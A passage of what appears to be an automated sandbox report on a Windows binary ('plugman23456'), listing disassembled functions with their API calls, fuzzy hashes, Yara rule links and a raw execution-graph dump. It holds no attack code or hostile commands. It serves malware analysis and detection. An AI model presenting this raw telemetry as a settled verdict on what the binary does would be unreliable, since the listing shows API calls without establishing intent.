                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                          • strlen.MSVCRT ref: 00403006
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                          • String ID:
                          • API String ID: 2754987064-0
                          • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                          • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                          • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                          • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                          Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                            • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                            • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                          • SetBkMode.GDI32(?,00000001), ref: 004143A2
                          • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                          • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                          • GetStockObject.GDI32(00000000), ref: 004143C6
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                          • String ID:
                          • API String ID: 764393265-0
                          • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                          • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                          • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                          • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                          Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                          Download Yara Rule
                          APIs
                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                          • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                          • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Time$System$File$LocalSpecific
                          • String ID:
                          • API String ID: 979780441-0
                          • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                          • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                          • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                          • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                          Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                          Download Yara Rule
                          APIs
                          • memcpy.MSVCRT ref: 004134E0
                          • memcpy.MSVCRT ref: 004134F2
                          • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                          • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy$DialogHandleModuleParam
                          • String ID:
                          • API String ID: 1386444988-0
                          • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                          • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                          • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                          • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                          Function 00411D08 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                          • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: InvalidateMessageRectSend
                          • String ID: d=E
                          • API String ID: 909852535-3703654223
                          • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                          • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                          • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                          • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                          Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                          Download Yara Rule
                          APIs
                          • wcschr.MSVCRT ref: 0040F79E
                          • wcschr.MSVCRT ref: 0040F7AC
                            • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                            • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: wcschr$memcpywcslen
                          • String ID: "
                          • API String ID: 1983396471-123907689
                          • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                          • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                          • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                          • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                          Function 0040BFF3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                          • _memicmp.MSVCRT ref: 0040C00D
                          • memcpy.MSVCRT ref: 0040C024
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: FilePointer_memicmpmemcpy
                          • String ID: URL
                          • API String ID: 2108176848-3574463123
                          • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                          • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                          • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                          • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                          Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _snwprintfmemcpy
                          • String ID: %2.2X
                          • API String ID: 2789212964-323797159
                          • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                          • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                          • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                          • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                          Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _snwprintf
                          • String ID: %%-%d.%ds
                          • API String ID: 3988819677-2008345750
                          • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                          • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                          • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                          • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                          Function 0040E758 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 0040E770
                          • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: MessageSendmemset
                          • String ID: F^@
                          • API String ID: 568519121-3652327722
                          • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                          • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                          • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                          • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                          Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: PlacementWindowmemset
                          • String ID: WinPos
                          • API String ID: 4036792311-2823255486
                          • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                          • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                          • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                          • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                          Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@DeleteObject
                          • String ID: r!A
                          • API String ID: 1103273653-628097481
                          • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                          • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                          • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                          • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                          Function 0040DCE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                          • wcsrchr.MSVCRT ref: 0040DCE9
                          • wcscat.MSVCRT ref: 0040DCFF
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: FileModuleNamewcscatwcsrchr
                          • String ID: _lng.ini
                          • API String ID: 383090722-1948609170
                          • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                          • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                          • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                          • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                          Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy$memset
                          • String ID:
                          • API String ID: 438689982-0
                          • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                          • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                          • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                          • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                          Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??2@$memset
                          • String ID:
                          • API String ID: 1860491036-0
                          • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                          • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                          • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                          • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                          Function 00408ADC Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                          Download Yara Rule
                          APIs
                          • memcmp.MSVCRT ref: 00408AF3
                            • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                            • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                            • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                          • memcmp.MSVCRT ref: 00408B2B
                          • memcmp.MSVCRT ref: 00408B5C
                          • memcpy.MSVCRT ref: 00408B79
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcmp$memcpy
                          • String ID:
                          • API String ID: 231171946-0
                          • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                          • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                          • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                          • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                          Function 00409D1F Relevance: 5.0, APIs: 4, Instructions: 32COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: wcslen$wcscat$wcscpy
                          • String ID:
                          • API String ID: 1961120804-0
                          • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                          • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                          • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                          • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                          Execution Graph

                          Execution Coverage:3%
                          Dynamic/Decrypted Code Coverage:23%
                          Signature Coverage:0.5%
                          Total number of Nodes:966
                          Total number of Limit Nodes:15
                          execution_graph 34259 40fc40 70 API calls 34434 403640 21 API calls 34260 427fa4 42 API calls 34435 412e43 _endthreadex 34436 425115 76 API calls __fprintf_l 34437 43fe40 133 API calls 34263 425115 83 API calls __fprintf_l 34264 401445 memcpy memcpy DialogBoxParamA 34265 440c40 34 API calls 33237 444c4a 33256 444e38 33237->33256 33239 444c56 GetModuleHandleA 33240 444c68 __set_app_type __p__fmode __p__commode 33239->33240 33242 444cfa 33240->33242 33243 444d02 __setusermatherr 33242->33243 33244 444d0e 33242->33244 33243->33244 33257 444e22 _controlfp 33244->33257 33246 444d13 _initterm __getmainargs _initterm 33247 444d6a GetStartupInfoA 33246->33247 33249 444d9e GetModuleHandleA 33247->33249 33258 40cf44 33249->33258 33253 444dcf _cexit 33255 444e04 33253->33255 33254 444dc8 exit 33254->33253 33256->33239 33257->33246 33309 404a99 LoadLibraryA 33258->33309 33260 40cf60 33295 40cf64 33260->33295 33316 410d0e 33260->33316 33262 40cf6f 33320 40ccd7 ??2@YAPAXI 33262->33320 33264 40cf9b 33334 407cbc 33264->33334 33269 40cfc4 33352 409825 memset 33269->33352 33270 40cfd8 33357 4096f4 memset 33270->33357 33275 407e30 _strcmpi 33277 40cfee 33275->33277 33276 40d181 ??3@YAXPAX 33278 40d1b3 33276->33278 33279 40d19f DeleteObject 33276->33279 33281 40cff2 RegDeleteKeyA 33277->33281 33282 40d007 EnumResourceTypesA 33277->33282 33381 407948 ??3@YAXPAX ??3@YAXPAX 33278->33381 33279->33278 33281->33276 33284 40d047 33282->33284 33285 40d02f MessageBoxA 33282->33285 33283 40d1c4 33382 4080d4 33283->33382 33287 40d0a0 CoInitialize 33284->33287 33362 40ce70 33284->33362 33285->33276 33379 40cc26 strncat memset RegisterClassA CreateWindowExA 33287->33379 33293 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33380 40c256 PostMessageA 33293->33380 33295->33253 33295->33254 33296 40d061 ??3@YAXPAX 33296->33278 33299 40d084 DeleteObject 33296->33299 33297 40d09e 33297->33287 33299->33278 33301 40d0f9 GetMessageA 33302 40d17b CoUninitialize 33301->33302 33303 40d10d 33301->33303 33302->33276 33304 40d113 TranslateAccelerator 33303->33304 33306 40d145 IsDialogMessage 33303->33306 33307 40d139 IsDialogMessage 33303->33307 33304->33303 33305 40d16d GetMessageA 33304->33305 33305->33302 33305->33304 33306->33305 33308 40d157 TranslateMessage DispatchMessageA 33306->33308 33307->33305 33307->33306 33308->33305 33310 404ac4 GetProcAddress 33309->33310 33312 404ae8 33309->33312 33311 404add FreeLibrary 33310->33311 33313 404ad4 33310->33313 33311->33312 33314 404b13 33312->33314 33315 404afc MessageBoxA 33312->33315 33313->33311 33314->33260 33315->33260 33317 410d17 LoadLibraryA 33316->33317 33318 410d3c 33316->33318 33317->33318 33319 410d2b GetProcAddress 33317->33319 33318->33262 33319->33318 33321 40cd08 ??2@YAPAXI 33320->33321 33323 40cd26 33321->33323 33324 40cd2d 33321->33324 33393 404025 6 API calls 33323->33393 33326 40cd66 33324->33326 33327 40cd59 DeleteObject 33324->33327 33386 407088 33326->33386 33327->33326 33329 40cd6b 33389 4019b5 33329->33389 33332 4019b5 strncat 33333 40cdbf _mbscpy 33332->33333 33333->33264 33395 407948 ??3@YAXPAX ??3@YAXPAX 33334->33395 33336 407e04 33396 407a55 33336->33396 33339 407a1f malloc memcpy ??3@YAXPAX ??3@YAXPAX 33346 407cf7 33339->33346 33340 407ddc 33340->33336 33417 407a1f 33340->33417 33342 407d7a ??3@YAXPAX 33342->33346 33346->33336 33346->33339 33346->33340 33346->33342 33399 40796e strlen 33346->33399 33409 406f30 33346->33409 33347 40796e 7 API calls 33347->33336 33348 407e30 33349 407e38 33348->33349 33350 407e57 33348->33350 33349->33350 33351 407e41 _strcmpi 33349->33351 33350->33269 33350->33270 33351->33349 33351->33350 33422 4097ff 33352->33422 33354 409854 33427 409731 33354->33427 33358 4097ff 3 API calls 33357->33358 33359 409723 33358->33359 33447 40966c GetFileAttributesA GetPrivateProfileStringA _mbscpy _mbscpy GetPrivateProfileIntA 33359->33447 33361 40972b 33361->33275 33448 4023b2 33362->33448 33368 40ced3 33543 40cdda 7 API calls 33368->33543 33369 40cece 33372 40cf3f 33369->33372 33489 40c3d0 memset GetModuleFileNameA strrchr 33369->33489 33372->33296 33372->33297 33375 40ceed 33517 40affa 33375->33517 33379->33293 33380->33301 33381->33283 33383 4080e1 33382->33383 33384 4080da ??3@YAXPAX 33382->33384 33385 407948 ??3@YAXPAX ??3@YAXPAX 33383->33385 33384->33383 33385->33295 33394 406fc7 memset _mbscpy 33386->33394 33388 40709f CreateFontIndirectA 33388->33329 33390 4019e1 33389->33390 33391 4019c2 strncat 33390->33391 33392 4019e5 memset LoadIconA 33390->33392 33391->33390 33392->33332 33393->33324 33394->33388 33395->33346 33397 407a65 33396->33397 33398 407a5b ??3@YAXPAX 33396->33398 33397->33348 33398->33397 33400 4079a1 33399->33400 33401 407998 ??3@YAXPAX 33399->33401 33403 406f30 3 API calls 33400->33403 33402 4079ab 33401->33402 33404 4079c4 33402->33404 33405 4079bb ??3@YAXPAX 33402->33405 33403->33402 33407 406f30 3 API calls 33404->33407 33406 4079d0 memcpy 33405->33406 33406->33346 33408 4079cf 33407->33408 33408->33406 33410 406f37 malloc 33409->33410 33411 406f7d 33409->33411 33413 406f73 33410->33413 33414 406f58 33410->33414 33411->33346 33413->33346 33415 406f6c ??3@YAXPAX 33414->33415 33416 406f5c memcpy 33414->33416 33415->33413 33416->33415 33418 407a38 33417->33418 33419 407a2d ??3@YAXPAX 33417->33419 33421 406f30 3 API calls 33418->33421 33420 407a43 33419->33420 33420->33347 33421->33420 33438 406f96 GetModuleFileNameA 33422->33438 33424 409805 strrchr 33425 409814 33424->33425 33426 409817 _mbscat 33424->33426 33425->33426 33426->33354 33439 44b090 33427->33439 33432 40930c 3 API calls 33433 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33432->33433 33434 4097c5 LoadStringA 33433->33434 33437 4097db 33434->33437 33436 4097f3 33436->33276 33437->33434 33437->33436 33446 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33437->33446 33438->33424 33440 40973e _mbscpy _mbscpy 33439->33440 33441 40930c 33440->33441 33442 44b090 33441->33442 33443 409319 memset GetPrivateProfileStringA 33442->33443 33444 409374 33443->33444 33445 409364 WritePrivateProfileStringA 33443->33445 33444->33432 33445->33444 33446->33437 33447->33361 33544 409c1c 33448->33544 33451 401e69 memset 33583 410dbb 33451->33583 33454 401ec2 33614 4070e3 strlen _mbscat _mbscpy _mbscat 33454->33614 33455 401ed4 33599 406f81 GetFileAttributesA 33455->33599 33458 401ee6 strlen strlen 33460 401f15 33458->33460 33461 401f28 33458->33461 33615 4070e3 strlen _mbscat _mbscpy _mbscat 33460->33615 33600 406f81 GetFileAttributesA 33461->33600 33464 401f35 33601 401c31 33464->33601 33467 401f75 33613 410a9c RegOpenKeyExA 33467->33613 33468 401c31 7 API calls 33468->33467 33470 401f91 33471 402187 33470->33471 33472 401f9c memset 33470->33472 33474 402195 ExpandEnvironmentStringsA 33471->33474 33475 4021a8 _strcmpi 33471->33475 33616 410b62 RegEnumKeyExA 33472->33616 33625 406f81 GetFileAttributesA 33474->33625 33475->33368 33475->33369 33477 40217e RegCloseKey 33477->33471 33478 401fd9 atoi 33479 401fef memset memset sprintf 33478->33479 33487 401fc9 33478->33487 33617 410b1e 33479->33617 33482 402165 33482->33477 33483 406f81 GetFileAttributesA 33483->33487 33484 402076 memset memset strlen strlen 33484->33487 33485 4070e3 strlen _mbscat _mbscpy _mbscat 33485->33487 33486 4020dd strlen strlen 33486->33487 33487->33477 33487->33478 33487->33482 33487->33483 33487->33484 33487->33485 33487->33486 33488 402167 _mbscpy 33487->33488 33624 410b62 RegEnumKeyExA 33487->33624 33488->33477 33490 40c422 33489->33490 33491 40c425 _mbscat _mbscpy _mbscpy 33489->33491 33490->33491 33492 40c49d 33491->33492 33493 40c512 33492->33493 33494 40c502 GetWindowPlacement 33492->33494 33495 40c538 33493->33495 33646 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33493->33646 33494->33493 33639 409b31 33495->33639 33499 40ba28 33500 40ba87 33499->33500 33506 40ba3c 33499->33506 33649 406c62 LoadCursorA SetCursor 33500->33649 33502 40ba8c 33650 410a9c RegOpenKeyExA 33502->33650 33651 4107f1 33502->33651 33654 410808 33502->33654 33658 404734 33502->33658 33666 404785 33502->33666 33669 403c16 33502->33669 33503 40ba43 _mbsicmp 33503->33506 33504 40baa0 33505 407e30 _strcmpi 33504->33505 33509 40bab0 33505->33509 33506->33500 33506->33503 33743 40b5e5 10 API calls 33506->33743 33507 40bafa SetCursor 33507->33375 33509->33507 33510 40baf1 qsort 33509->33510 33510->33507 34201 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33517->34201 33519 40b00e 33520 40b016 33519->33520 33521 40b01f GetStdHandle 33519->33521 34202 406d1a CreateFileA 33520->34202 33523 40b01c 33521->33523 33524 40b035 33523->33524 33525 40b12d 33523->33525 34203 406c62 LoadCursorA SetCursor 33524->34203 34207 406d77 9 API calls 33525->34207 33528 40b136 33538 40c580 33528->33538 33529 40b087 33536 40b0a1 33529->33536 34205 40a699 12 API calls 33529->34205 33530 40b042 33530->33529 33530->33536 34204 40a57c strlen WriteFile 33530->34204 33533 40b0d6 33534 40b116 CloseHandle 33533->33534 33535 40b11f SetCursor 33533->33535 33534->33535 33535->33528 33536->33533 34206 406d77 9 API calls 33536->34206 33539 40c597 33538->33539 33540 40c58b 33538->33540 33539->33372 34208 404156 33540->34208 33543->33369 33556 409a32 33544->33556 33547 409c80 memcpy memcpy 33548 409cda 33547->33548 33548->33547 33549 408db6 12 API calls 33548->33549 33550 409d18 ??2@YAPAXI ??2@YAPAXI 33548->33550 33549->33548 33551 409d8b 33550->33551 33553 409d54 ??2@YAPAXI 33550->33553 33566 409b9c 33551->33566 33553->33551 33555 4023c1 33555->33451 33557 409a44 33556->33557 33558 409a3d ??3@YAXPAX 33556->33558 33559 409a52 33557->33559 33560 409a4b ??3@YAXPAX 33557->33560 33558->33557 33561 409a63 33559->33561 33562 409a5c ??3@YAXPAX 33559->33562 33560->33559 33563 409a83 ??2@YAPAXI ??2@YAPAXI 33561->33563 33564 409a73 ??3@YAXPAX 33561->33564 33565 409a7c ??3@YAXPAX 33561->33565 33562->33561 33563->33547 33564->33565 33565->33563 33567 407a55 ??3@YAXPAX 33566->33567 33568 409ba5 33567->33568 33569 407a55 ??3@YAXPAX 33568->33569 33570 409bad 33569->33570 33571 407a55 ??3@YAXPAX 33570->33571 33572 409bb5 33571->33572 33573 407a55 ??3@YAXPAX 33572->33573 33574 409bbd 33573->33574 33575 407a1f 4 API calls 33574->33575 33576 409bd0 33575->33576 33577 407a1f 4 API calls 33576->33577 33578 409bda 33577->33578 